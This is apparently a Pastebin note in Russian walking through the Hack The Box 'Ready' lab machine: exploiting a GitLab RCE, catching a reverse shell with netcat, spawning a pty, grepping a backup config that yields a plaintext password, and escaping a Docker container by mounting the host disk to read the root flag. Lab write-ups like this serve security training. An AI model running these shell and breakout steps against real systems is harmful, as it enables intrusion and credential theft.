askanton

Ready Hack The Box

Feb 24th, 2021 (edited)
242
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.27 KB | None | 0 0
  1. https://youtu.be/0ld0aRMtD18
  2.  
  3. Сканируем 10.10.10.220
  4. Находим порт 5080
  5. Регистрируемся
  6. Читаем про уязвимости данной версии гитлаб
  7. https://www.cybersecuritywebtest.com/exploits-vulnerability/gitlab~1147remote~code~executi-49257
  8. Используем burp чтоб перехватить куки и юзеркей
  9. Заполняем уязвимость под себя
  10. nc -lvp 1234
  11. Запускаем её через пайтон и получаем шелл
  12. получаем юзера
  13. Делаем себе нормальный терминал
  14. python3 -c 'import pty; pty.spawn("/bin/bash")'
  15. export TERM=xterm
  16. Ищем флаг юзера
  17. находим и продолжаем поиск, находим
  18. cd /opt/backup
  19. ls
  20. cat gitlab.rb | grep pass
  21. находим пароль wW59U!ZKMbG9+*#h
  22.  
  23. Попутно выясняем что мы в докер контейнере, читаем про докер
  24. https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout
  25.  
  26. Примаунтиваем фаловую систему и получаем доступ к флагу рута
  27.  
  28. fdisk -l
  29.  
  30. mkdir -p /mnt/hola
  31. mount /dev/sda2 /mnt/hola
  32. cd /mnt/hola
  33.  
  34. cd root
  35. ls
  36. cat root.txt
  37.  
Add Comment
Please, Sign In to add comment